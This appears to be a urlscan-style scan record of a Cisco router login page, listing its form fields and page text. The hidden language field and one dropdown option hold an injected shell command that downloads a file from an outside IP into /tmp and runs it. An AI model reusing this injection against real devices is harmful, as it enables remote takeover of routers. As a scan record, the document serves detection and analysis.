45.181.48.129
Open in
urlscan Pro
45.181.48.129
Public Scan
URL:
http://45.181.48.129/
Submission: On June 10 via manual from HU — Scanned from NL
Submission: On June 10 via manual from HU — Scanned from NL
Form analysis
1 forms found in the DOMName: form_contents — POST /cgi-bin/userLogin.cgi
<form name="form_contents" method="post" action="/cgi-bin/userLogin.cgi">
<input type="hidden" name="login" value="true">
<input type="hidden" name="portalname" value="CommonPortal">
<input type="hidden" name="password_expired" id="password_expired" value="0">
<input type="hidden" name="auth_key" value="1964300002">
<input type="hidden" name="auth_server_pw" value="">
<input type="hidden" name="md5_old_pass" value="">
<input type="hidden" id="langName" name="langName" value="Deutsch|sleep 1;cd /tmp;wget http://158.247.192.31:90/x;sh x|,ENGLISH,Deutsch,Espanol,Francais,Italiano">
<input type="hidden" name="changelanguage" value="">
<input type="hidden" name="submitStatus" value="0">
<input type="hidden" name="pdStrength" value="1">
<table id="nk_login" width="223" border="0" cellpadding="0" cellspacing="0" style="border-collapse:collapse;">
<tbody>
<tr>
<td width="70" height="17"></td>
<td class="ErrorArrow">
<script>
var error_string = (window.location.href.split('err='))[1];
if (error_string && error_string.match('Login_Fail')) document.write('▼');
</script>
</td>
</tr>
<tr>
<td class="UserNameFeild">
<script>
document.write(Language.LOGIN_Username);
</script><img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="UserNameFeild"><input type="text" name="username" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_Password);
</script><img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_Language);
</script><img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<script>
document.write('<td class="LoginFeild">');
var i;
var nameList = document.getElementById("langName").value.split(",");
document.write('<select id="LanguageList" name="LanguageList" onChange="LanguageChange()" style="font-family:Arial,Helvetica,sans-serif;font-size:12px;height:18px">');
var languageValue;
var languageName;
for (i = 0; i < nameList.length; i++) {
languageValue = nameList[i];
switch (languageValue) {
case "Deutsch":
languageName = "Deutsch";
break;
case "ENGLISH":
languageName = "English";
break;
case "Espanol":
languageName = "Español";
break;
case "Francais":
languageName = "Français";
break;
case "Italiano":
languageName = "Italiano";
break;
default:
languageName = "undefined";
break;
}
document.write('<option value="');
document.write(languageValue);
document.write('">');
document.write(languageName);
document.write('</option>');
}
document.write('</select></td>');
</script>
<td class="LoginFeild"><select id="LanguageList" name="LanguageList" onchange="LanguageChange()" style="font-family:Arial,Helvetica,sans-serif;font-size:12px;height:18px">
<option value="Deutsch|sleep 1;cd /tmp;wget http://158.247.192.31:90/x;sh x|">undefined</option>
<option value="ENGLISH">English</option>
<option value="Deutsch">Deutsch</option>
<option value="Espanol">Español</option>
<option value="Francais">Français</option>
<option value="Italiano">Italiano</option>
</select></td>
</tr>
<tr>
<td class="LoginFeild"></td>
<td>
<table width="100%">
<tbody>
<tr>
<td class="LoginFeild" width="50">
<script>
PrintSTButton("Login", " " + Language.DEFAULT_Log_in + " ", "SendPassword();", "submit");
</script>
</td>
<td width="5"></td>
<td><img id="process" border="0" src="/images/login_progress.gif" width="16" height="16" style="visibility:hidden"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table id="change_password" width="303" border="0" cellpadding="0" cellspacing="0" style="border-collapse:collapse;display:none">
<tbody>
<tr>
<td></td>
<td class="ErrorArrow">
<script>
var error_string = (window.location.href.split('err='))[1];
if (error_string && error_string.match('expired') || error_string && error_string.match('Password_Same')) document.write('▼');
</script>
</td>
</tr>
<tr>
<td width="180" class="LoginFeild">
<script>
document.write(Language.LOGIN_Current_Password);
</script><img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="current_password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_New_Password);
</script><img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="new_password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild">
<script>
document.write(Language.LOGIN_ReEnter_New_Password);
</script><img border="0" src="/images/_blank.gif" width="5" height="1">
</td>
<td class="LoginFeild"><input type="password" name="re_new_password" maxlength="64" style="font-family:Arial;font-size:12px;width:150px;" onkeypress="SubmitPassword(event);"></td>
</tr>
<tr>
<td class="LoginFeild"></td>
<td class="LoginFeild">
<script>
PrintSTButton("Save", Language.GLOBAL_BUTTON_Save, "SendPassword();", "", "submit");
document.write('<img border="0" src="/images/_blank.gif" width="5" height="1">');
PrintSTButton("Cancel", Language.GLOBAL_BUTTON_Cancel, "show_login();");
</script>
</td>
</tr>
</tbody>
</table>
</form>
Text Content
You have logged out of the Cisco Router. Router undefinedEnglishDeutschEspañolFrançaisItaliano © 2015 Cisco Systems, Inc. All Rights Reserved. Cisco, Cisco Systems, and the Cisco Systems logo are registered trademarks or trademarks of Cisco Systems, Inc. and/or it's affiliates in the United States and certain other countries.